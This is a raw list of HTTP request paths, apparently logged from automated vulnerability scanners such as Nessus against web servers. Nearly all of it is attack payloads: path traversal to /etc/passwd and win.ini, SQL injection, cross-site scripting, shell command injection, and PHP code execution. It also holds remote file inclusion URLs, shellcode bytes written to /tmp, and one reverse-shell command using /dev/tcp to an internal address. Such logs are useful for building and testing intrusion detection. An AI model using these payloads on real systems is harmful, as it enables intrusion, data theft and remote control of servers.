/examples/jsp/error/ion-p.exe?page=c:\\winnt\\win.ini /cgi.cgi/pfdispaly.cgi?../../../../../../../../../../etc/passwd /scripts/ui/login?user=nessus-1331904327 /vmi8bb12.idc? /news_script/ /main.php?logout="&ver&rem\x0c /javascript/cc.exe /phpmyadmin.exe /examples/jsp/error/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00 /ovcgi/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" //

/new-year's/ /b5xdqgz2.pl? /top.php?stuff=del;q99348313&rem; /manager/docs.php?doc=../jpgraph-1.12.1/docs/index /month.exe ftp://192.168.24.203/* /fmnveedu.fts? /cgi-sys/windmail.exe /main.php?stuff="&ver,>q14633268&rem, /javascript/carts.exe /javascript/.htaccess.sfish/"`true`" /\..\..\..\..\..\..\..\..\..\windows\win.ini /examples/jsp/cal/admin/admin.php?sid=' /subscriptions.vb /zln2hm2z.cfc? /examples/jsp/sessions/index.php?page=/etc/passwd\x00 /examples/jsp/jsp2/jspx/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /help.php?q="ver\x0c>q88163734&rem\x0c /examples/jsp/error/search/show.pl?url=file:/etc/passwd /javascript/document.jpg /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200 /isapi/testisa.dll?check1= /examples/jsp/jsp2/jspx/javascript.php?abs_path=/etc/passwd\x00 /help.php?q="&del\x09q33725356&rem\x09 /javascript/topics.exe /en-us/i686v90l.kspx? /twg176/admin/index.php?lang=../../counter/_twg.log\x00 /top.php?stuff=;uname\x09>q71367433\x09# /javascript/protection.exe /examples/jsp/cal/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /examples/jsp/checkbox/index.php?show=../../../../../../../../../../../etc/passwd\x00 /imprimer.asp?no=c:\boot.ini|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'c:'. /examples/jsp/colors/index.php?cat_select= /help.php?q="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /path_script/createurl.php?formurl=http://192.168.202.96:8080/llumt7msyau5y? /en-us/hipkz026.kspx? /3hlysl2x.mscgi? /examples/jsp/colors/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 //

/main.php?stuff="&del\xa0q78321413&rem\xa0 /uvazfs7p.php? /javascript/scan.exe /jujgxwav.php? /javascript/pos.exe /examples/jsp/num/webadmin.php?show=/etc/passwd /en-us/account/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /main.php?logout="ping,-w,10000,-n,1,4.3.2.1|rem, /t7tm4m0b.php? /javascript/form.exe /main.php?logout='&sleep 9 # /script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.118:8080/zz5thkvtmlgl?? /examples/servlets/servlet/index.php?op=default&date=200607' union select 1,106876795,1,1,1,1,1,1,1,1--&blogid=1 /javascript/sam.exe /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /iajtej82.x? /main.php?stuff="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /script2/ /scripts/mail.php?id='/**/union/**/select/**/1,2,1332009308,4--&blog=1 /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/4dckqcc0acprbz? /rubrique.asp?no=c:\boot.ini|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'c:'. /ygkjkngd.cfm? /javascript/ver1.exe /scripts/t99iadgtkf9h.html /init.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm?? /m5103snj.cgi? /examples/jsp/jsp2/jspx/home/search.asp?nchannel='1 /nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00 /javascript/evt.exe /javascript/cgibin.exe /javascript/hop.exe /cgi-bin/include/error/autherror.cfm?errorcode=1&ftvar_linkp="> /wasdscripts172-ia64/ /phpmyadmin//................etc/passwd /help.php?q=';uname\x09# /examples/jsp/error/search= /g3w7y7u5.aspx? /rpc/..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c+dir /8x6w469u.html? /examples/jsp/error/login.php?user="> /t7tm4m0b.x? /examples/jsp/cal/main.php?g2_itemid=../../../../../license\x00 /zuihld5m.fts? /help.php?q="del\xa0q71425977&rem\xa0 /en-us/odzk29aa.cfm? /javascript/.htaccess/'"'"'"'" /de3v2dd9.php3? /help.php?q="|ping\x09-w\x097000\x09-n\x091\x091.2.3.4|rem\x09 /en-us/fo564rei.exe? /setup/setup-/../../log.jsp?log=info&mode=asc&lines=10 /examples/servlets/servlet/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /cgi.cgi/a1disp3.cgi?../../../../../../../../../../etc/passwd /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=q66155717 /javascript/faqs.exe /slscript/ /phpmyadmin/sgdynamo.exe?htname= /javascript/signed.exe /xsqln7eb.pl? /en-us/i686v90l.cfm? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /cgi-local/listrec.pl?app=qmh-news&template=;ls /etc| /scripts/gdxlwjnlsr6i.sh /d7ktpmcq.cgi? /examples/jsp/error/javascript.php?abs_path=/etc/passwd\x00 /en-us/oie504mr.pl? /fmnveedu.html? /awstats/awstats.pl?migrate=|echo;/bin/echo -en "zj\0003x\0315\0200xp1\0322\0262\0377\0266\0377\0001\0320" >> /tmp/wrkvkjjzem0;echo|awstats648649.txt /recordings/sawmillcl.exe?ho+{complete_version} /passwd-safe/ /manager/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /iv5vkgam.dll? /examples/jsp/jsp2/el/check_user_id.php?user_id= /index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /javascript/inbound.exe /phpmyadmin///../../../../../../../..etc/passwd /cgibin/sensepost.exe?/c+dir /zv8tv7h8.mscgi? /menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /uvazfs7p.kspx? /scripts/search.cgi?..\..\..\..\..\..\windows\win.ini /scripts/mt/ /b1q8bywu.exe? /help.php?q='\x0duname\x09>q63353886\x09# /g8nu2yy7.exe? /tramadol-prescription/ /examples/jsp/jsp2/jspx/webplus.exe?script=webplus_install_path.nasl /cacti/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /nuh3zirz.cgi? /news/scripts/news_page.php?script_path=http://192.168.202.118:8080/moclyxlwqyfjnp?? /subscriptions.test /manager/listrec.pl?app=qmh-news&template=;ls /etc| /main.php?stuff="&ver\x09>q48424932&rem\x09 /examples/jsp/cal/phptonuke.php?filnavn=/etc/passwd /test.php?evalme=eval($_server[http_x_mbnqgczvafwyars]); /scripts/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /examples/jsp/sessions/config.php?returnpath=/etc/passwd\x00 /cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\x00 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+debugolnb /main.php?stuff="\x0adel q16731133 # /zln2hm2z.cfc? /awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/wgwvwkorhp.sh;echo|awstats103474.txt /top.php?stuff=&del;q25243259&rem; /1r8cfrlf.htm? /javascript/room.exe /0qhcnefz.php? /8x6w469u.cgi? /blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /comments.php?subject=&comment=&pid=0&sid=0&mode=&order=&thold=op=preview /mail.php?id='/**/union/**/select/**/1,2,1331919225,4--&blog=1 /cgis/.htpasswd /javascript/buynow.exe /comments.php?scriptpath=http://192.168.202.96:8080/llumt7msyau5y?? /pxagj7n7.pl? /examples/jsp/jsp2/jspx/profil.php?id=1 /brian's guide to solving any perl problem/ /en-us/esmozg5d.html? /iajtej82.htm? /fc9t54l7.idc? /rpxyx07v.fts? /cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd\x00 /nsn/..\util/slist.bas /en-us/i686v90l.exe? /examples/jsp/sessions/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /j734qobz.asp? /script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/zz5thkvtmlgl? /top.php?stuff="ping,-w,11000,-n,1,1.2.3.4&rem, /script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp?? /queen's-quest/ /jnt3f86c.fts? /phpmyadmin/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 /e9rx3ya4.x? /javascript/sunos.exe /examples/jsp/jsp2/el/index.php?sensor_program= /cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat /etc/passwd| /javascript/charge.exe /help.php?q="&ping,-w,7000,-n,1,4.3.2.1&rem, /scripts/webc.cgi/ /examples/jsp/jsp2/jspx/index.php?id='union/**/select/**/0,0,1843478711,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /examples/jsp/sessions/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /examples/jsp/checkbox/review.php?id=1&cat=&subcat="> /examples/jsp/checkbox/protection.php?action=logout&siteurl=/etc/passwd /help.php?q=";del q19897274 # /scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/whmch8ftkt7kv? /3hlysl2x.cgi? /recordings/activatemember?activatecode=&member="> /top.php?stuff="&rm\x09q43482464&rem\x09 /hipkz026.pl? /manager/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /n1afe1y6.x? /apavxugx.kspx? /javascript/system.exe /admin/geo_zones.php?zone= /main.php?stuff="|ping;-w;9000;-n;1;1.2.3.4|rem; /top.php?stuff="&del\x0bq71858742&rem\x0b /forums/index.php?top_message=<script>alert(document.cookie)</script> /scripts/h3d1n9eaqxv3.cgi /cacti/index.php?src=1&_common=1&time=1331909415&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /scripts/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_8ypa_2_i]));die;/* /exchange/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /scripts/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /gy23xnjq.pl? /admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2 /javascript/pipe.exe /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+64+6c+6c+20+47+65+74+50+72+6f+63+41+64+64+72+65+73+73+4c+6f+61+64+4c+69+62++>>esbq /examples/jsp/sessions/index.php?mod_id=2&kb_ask= /administrator/upload.php?newbanner=1&choice=\" /main.php?logout="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /fnwhrxyd.exe? /examples/jsp/checkbox/session/login.php?dest=nessus">">'>'" /scripts/cevvxrxqxc_b.cgi /recordings/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /en-us/oie504mr.aspx? /manager/pals-cgi?palsaction=restart&documentname=/etc/passwd /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/ghl9il?? /javascript/progress.exe /scripts/formmail /en-us/oie504mr.exe? /scripts/lom_update.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl? /examples/servlets/servlet/protection.php?action=logout&siteurl=/etc/passwd /examples/jsp/colors/sendcard.php?view=1&id='sendcard_sql.nasl /ans/ans.pl?p=../../../../../usr/bin/id|&blah /noprescriptionphentermine/ /javascript/cxf.exe /top.php?stuff=uname >q79861172 # /manager/athenareg.php?pass= ;id /examples/jsp/jsp2/el/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /d44uk9h2.cgi? /yef5f3d5.fts? /javascript/item.exe /ghswfouu.kspx? /examples/jsp/jsp2/el/forum.php?do=viewtopic&cat=1&topic=1&page=1?q62126743\x09# /javascript/programming.exe /cgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /examples/jsp/colors/forum.php?do=viewtopic&cat=1&topic=1&page=1?cross_site_scripting.nasl /examples/jsp/sessions/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd /en-us/account/ovlaunch.exe /examples/servlets/servlet?username="cross_site_scripting.nasl /pbserver/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir /index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd /x2gyorli.cgi? /top.php?stuff='\x0duname >q76686472 # /h21y8w52.dll? /cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /script/common.inc.php?path_inc=@rfiurl /b1q8bywu.jsp? /webcalendar/colors.php?color= /yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.96:8080/4dckqcc0acprbz?? /scripts/admin/users.php /quagynka.nsf? /main.php?stuff=1985387140' and 1=1 and ''<>'bvys4izi /javascript/.htaccess.sfish/"`uname`" /subscriptionhomepage/ /3j8echh0.htm? /bn857frh.idc? /javascript/htpasswd.xslt /javascript/ms.exe /john battelle's searchblog/ /s7qus4g3.htm? /scripts/c/portal/login /ygkjkngd.dll? /zln2hm2z.php? /top.php?stuff=uname\x09>q38266346\x09# /webtop/wdk/samples/dumprequest.jsp?j=f /copying/

/o1zj4u9v.html? /javascript/.passwd.jsf /3m5knyc4.fts? /examples/jsp/colors/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd /qczkquis.jsp? /bxnyrhmh.exe? /javascript/digg.exe /examples/servlets/servlet/index.php?user_langue=../../../../../../../../../../etc/passwd /help.php?q="ping\x0c-w\x0c7000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c / /j4oqyvga.mscgi? /nuh3zirz.do? /scripts/remindpasswd /examples/jsp/sessions/sources/functions.php?root_path=/etc/passwd\x00 /phpmyadmin/awstatstotals.php?sort="].phpinfo().exit().$a[" /javascript/dialog.exe /examples/jsp/cal/calendar.php?serverpath=/etc/passwd\x00 /20040209_transcript/ /top.php?stuff="ping;-w;10000;-n;1;4.3.2.1&rem; /manager/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /main.php?logout=&uname >q27658181 # /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331904472.php. /examples/jsp/jsp2/jspx/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /t578vqea.x? /phpmyadmin/review.php?id=1&cat=&subcat="> /gw5/gwweb.exe?help=bad-request /main.php?logout="|ping;-w;9000;-n;1;4.3.2.1|rem; /javascript/dialogs.exe /scripts/help.php /quagynka.jsp? /edzaia0i.php? /uc3w3bdi.php3? /ows-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /examples/jsp/sessions/admin/admin.php?sid=0' /javascript/diffs.exe /script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl? /vmi8bb12.x? /main.php?logout="rm\x09q74671245\x09# /en-us/manager/search/data/inputs/script /archive.php?scriptpath=http://192.168.202.96:8080/txenjrxf3?? /scripts/buoalakxhatu.cfm /examples/jsp/checkbox/whois.cgi?action=load&whois=;id /main.php?stuff="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c /subscriptionscenter/ /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/txenjrxf3?? /javascript/trees.exe /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- /en-us/h5sc3gxy.asp? /examples/jsp/cal/search= /examples/jsp/jsp2/el/showcat.php?cat=1' /dslpwt15.kspx? /examples/jsp/jsp2/jspx/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=; /cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/2aibfaczmac8?? /top.php?stuff="ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1&rem\x0c /top.php?stuff=;rm\x09q51161767\x09# /fmnveedu.html? /examples/jsp/checkbox/javascript.php?abs_path=/etc/passwd\x00 /e9rx3ya4.cgi? /main.php?logout="ping,-w,11000,-n,1,4.3.2.1|rem, /javascript/.htpasswd.sfish/"`uname`" /examples/jsp/sessions/cal_week.php?op=week&catview=999' /manager/hw3.cgi?daysonly=0).system('id').( /main.php?logout=ver >q98354754&rem /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/zz5thkvtmlgl?? /gvx7m5ti.nsf? /cgi-bin/bsguest.cgi?email=x;ls /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0174\0044\0000\0377\0347" >> /tmp/urcppbumwm0;echo|awstats447671.txt /crystalreportwebformviewer2/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini /scripts/index.php?cat_select= /examples/jsp/jsp2/el/search.cgi?..\..\..\..\..\..\winnt\win.ini /eei78ore.asp? /examples/jsp/cal/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /scripts/wspd_cgi.sh/wservice=wsbroker1/webutil/ping.p /scripts/verify.asp?username=' /inc/formmail.inc.php?script_root=http://192.168.202.96:8080/txenjrxf3? /phpmyadmin/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm??cmd=id;pwd /phpmyadmin/sendcard.php?view=1&id='sendcard_sql.nasl /index.html?urlmaskfilter= /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=&scr_height=q89818741&scr_width= /t7tm4m0b.x? /examples/jsp/num/wordtrans.php?command=show_desc&advanced=1";id; true " /help.php?q="&ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09 /6n7aacgg.jspa? /script11/ /javascript/simple.exe /addvip.php?msetstr[\"progsdir\"]=http://cirt.net/rfiinc.txt? /examples/jsp/error/index.php?search= /help.php?q=ver\x0b>q19552399&rem\x0b /script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/2aibfaczmac8?? /top.php?stuff="rm\xa0q69465625&rem\xa0 /g3w7y7u5.nsf? /examples/jsp/error/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /mpcgi/.htpasswd /b1q8bywu.php3? /main.php?frm_daynight=day&frm_passwd=&frm_referer=q43818971&frm_user=&scr_height=&scr_width= /main.php?stuff='&del q78458992 # /j4oqyvga.x? /whatisscriptingnews/ /help.php?q=';uname\x09>q85144243\x09# /scripts/search.jsp?q=%" /manager/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /cgi-bin/search.jsp?q=%" /clk;38417398;7163019;r/ /scripts/gdxlwjnlsr6i.pl /search.jsp?q=%" /en-us/h5sc3gxy.idc? /javascript/tracks.exe ftp://192.168.25.103/* /main.php?logout="&ver&rem\x0b /fpnpp5zg.dll? /examples/jsp/jsp2/jspx/viewpage.php?file=/etc/passwd /phpmyadmin//........................................................................../../../../../../../../windows/win.ini /ap58k3ci.php3? /azcrfs8d.dll? /cacti/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161 /rv98iwjp.kspx? /examples/jsp/jsp2/el/shopexd.asp?catalogid='42 /index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /javascript/listinfo.exe /xlj7h65o.htm? /byrg33fw.cgi? /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331923201 /examples/jsp/jsp2/el/sendtemp.pl?templ=../../../../../etc/passwd /cgi-perl/testcgi.exe /henry d'allemagne polichinelle et son v??locip??de / /fa8p8lr8.do? /top.php?stuff=^' /news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl /microsoft office 2007 suite's + add on programs/ /scripts/lce0cbkfb8xx.php /i7prbs22.cfm? /examples/jsp/jsp2/el/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /cgi-bin/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js /..\..\..\..\..\..\..\..\..\..\windows\win.ini /subscription_promotion/ /e9rx3ya4.pl? /cgi-bin/cslivesupport.cgi?command=savesetup&setup=;system('cat /etc/passwd') /javascript/clicks.exe /mv8wxfy9.fts? /scripts/story.pl?next=../../../../../etc/passwd\x00 /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010406,1,1928557356-- /help.php?q=&del;q15387485&rem; /cacti/include/config_settings.php?config[include_path]=/etc/passwd\x00 /cgis/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /main.php?stuff="ping,-w,11000,-n,1,1.2.3.4&rem, /etree-scripts/ /magician's/ /examples/jsp/checkbox/direct.php?rf=/etc/passwd\x00 /a0imiuf1.php? /phpmyadmin/kb.cgi?view='&lang=en /recordings/config.php?path[docroot]=/etc/passwd\x00 /bzuf9ozq.cgi? /azcrfs8d.html? /n1afe1y6.cfc? /javascript/lock.exe /search/submit.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? /now that's what i call xmas - 3cd's/ /byrg33fw.cfc? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+0c+20+ae+75+e9+e2+f7+8b+73+18+8d+45+0d+50+6a+0e+e8+18+00+00+00+50+8d+45+1b++>>esbq /javascript/.htpasswd.sfish/9 1 - /scripts_1/ /d7ktpmcq.kspx? /ydexw8by.php3? /examples/jsp/jsp2/jspx/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html /cacti/viewpage.php?file=/etc/passwd /rv98iwjp.kspx? /phorum/admin/footer.php?globals[message]= /bxnyrhmh.nsf? /cgi-bin/index.php?id=urjhxcl19w' /examples/jsp/checkbox/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/checkbox/perl.exe?-v /scripts/hints.pl?|id| /javascript/daemon.exe /nmw0do67.pl? /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /en-us/i686v90l.nsf? /opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00 /shell_script/ /cgi.cgi/vssetcookie.exe /scripts/nbmember.cgi?cmd=test /help.php?q="\x0drm\x09q76412123\x09# /javascript/htpasswd.php /scriptv0105192/ /help.php?q=";uname >q69686889 # /main.php /en-us/fo564rei.dll? /examples/jsp/sessions/bb-hist.sh?histfile=../../../../../etc/passwd /javascript/closed.exe /i686v90l.html? /mv8wxfy9.fts? /help.php?q="&rm q11415113 # /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/llumt7msyau5y??&cmd=id /h4bi26jd.idc? /help.php?q='&uname >q67988136 # /recordings/search/show.pl?url=file:/etc/passwd /help.php?q='\x0arm\x09q47355772\x09# /169okeyj.jsp? /inc/download_center_lite.inc.php?script_root=http://192.168.202.96:8080/txenjrxf3? /top.php?stuff="rm q61611865&rem /upload.php?type=\" /cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd /examples/jsp/num/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /main.php?stuff="&del\xa0q65461871&rem\xa0 /en-us/33y9gcqq.nsf? /javascript/wp-login.exe /mv8wxfy9.do? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>ctdn /aj3pf49c.aspx? /examples/jsp/cal/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /m4kkjf8l.pl? /examples/jsp/num/index.php?op=default&date=200607' union select 1,652029819,1,1,1,1,1,1,1,1--&blogid=1 /b1q8bywu.cfm? /recordings/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /clk;63222941;7163019;d/ /examples/jsp/checkbox/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd /en-us/account/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /javascript/meta.exe /phpmyadmin/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00 /main.php?stuff="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09 /l4fz1dqw.cfm? /i686v90l.fts? /miz4r5hz.pl? /scripts/prnnucptkixl.shtml /prescriptive_guide/ /scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,390336409-- /examples/servlets/servlet/viewpage.php?file=/etc/passwd /main.php?logout=';rm\x09q35732238\x09# /h5i6crm3.php3? /scripts/eezuu7xc7ge3.shtml /7uz3ok60.fts? /fo564rei.pl? /examples/jsp/cal/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /en-us/oie504mr.jsp? /recordings/server.pt?open=space&name=";} /javascript/spy.exe /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1../../../../../../../../../../tmp/writetest1351541121.txt /help.php?q="\x0duname\x09>q93881688\x09# /main.php?logout="\x0adel\x09q43175153\x09# /as_noscript/ /european'no'tosoftwarepatentdirectiveleavesdoorsopentoprotectionofnewideas/ /x2gyorli.php3? /daddy's little princess/ /d5a5renl.fts? /v3axg1p8.x? /inc/formmail.inc.php?script_root=http://192.168.202.118:8080/zz5thkvtmlgl? // /b5xdqgz2.jspa? /help.php?q="\x0auname >q73214822 # /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0367\0322\0041\03201\0311qqj\0042j\0007pq\0211\0343" >> /tmp/gjehhrjnrx0;echo|awstats193123.txt /awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/yzicxmyifv0;echo|awstats535416.txt /scripts/cwmail.exe /nuh3zirz.fts? /examples/jsp/jsp2/el/lib/dbman_filter.inc.php?lib_path=/etc/passwd\x00 /main.php?stuff=ver\x0b>q86682811&rem\x0b /javascript/profiling.exe /main.php?stuff="del\x09q23164795&rem\x09 /j4rdyhw8.kspx? /scripts/%2e./..%5cwinnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe 1ecj.exe /cgi-915/c32web.exe/changeadminpassword /src/scripture.php?pageheaderfile=http://192.168.202.118:8080/ghl9il?? /examples/jsp/checkbox/athenareg.php?pass= ;id /b5xdqgz2.x? /scripts/index.php?op=default&date=200607' union select 1,597038072,1,1,1,1,1,1,1,1--&blogid=1 /scs86g1p.nsf? /tuwjta1w.php3? /aj3pf49c.do? /javascript/text.exe /forum-ra_professionnel.asp?n=/....../boot.ini /modules.php?name=stories_archive&sa=show_month&year=&month=3&month_l=test /examples/jsp/jsp2/el/backend/classes.php?include_path=../lib/jinzora.js\x00 /archive.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl?? /top.php?stuff="ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /gy23xnjq.mscgi? /main.php?logout="&ver\x0c>q31768299&rem\x0c /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/welwcbtdbf0;')."]=1 /cgi-perl/r.cgi?file=../../../../../../../../../../etc/passwd /javascript/more.exe /nyjgaorz.exe? /projects/1/repository/annotate?rev=`0<&200-;exec 200<>/dev/tcp/192.168.202.96/16919;sh <&200 >&200 2>&200` /cgi-bin/index.php?site=../../../../../../../../etc/passwd\x00 /addvip.php?msetstr[\"progsdir\"]=@rfiurl /examples/jsp/num/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /index.php?id='union/**/select/**/0,0,1649969852,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /en-us/account/htgrep/file=index.html&hdr=/etc/passwd /openfile.aspx?file=../../../../../../../../../../boot.ini /en-us/hipkz026.idc? /cgi-bin/search.jsp?q=%" /phpmyadmin/perl.exe?-v / /examples/jsp/colors/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /manager/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\x00 /m5103snj.cfc? /oie504mr.exe? /scripts/mail.cgi /iv5vkgam.kspx? /? /includes/footer.php?template=../../admin/images/admin_headbg.gif\x00 /n1afe1y6.kspx? /7dbjwpw6.do? /main.php?logout='\x0auname >q63177134 # /examples/jsp/num/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /main.php?logout="&ver&rem\x09 /cacti/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" / /examples/jsp/jsp2/el/doc/index.php?s=/etc/passwd\x00 /fcgi-bin/msmmask.exe?mask=/junk334 /search_results.dot?search_query=nessus">/ /javascript/card.exe /manager/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00 /scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- /eei78ore.jsp? 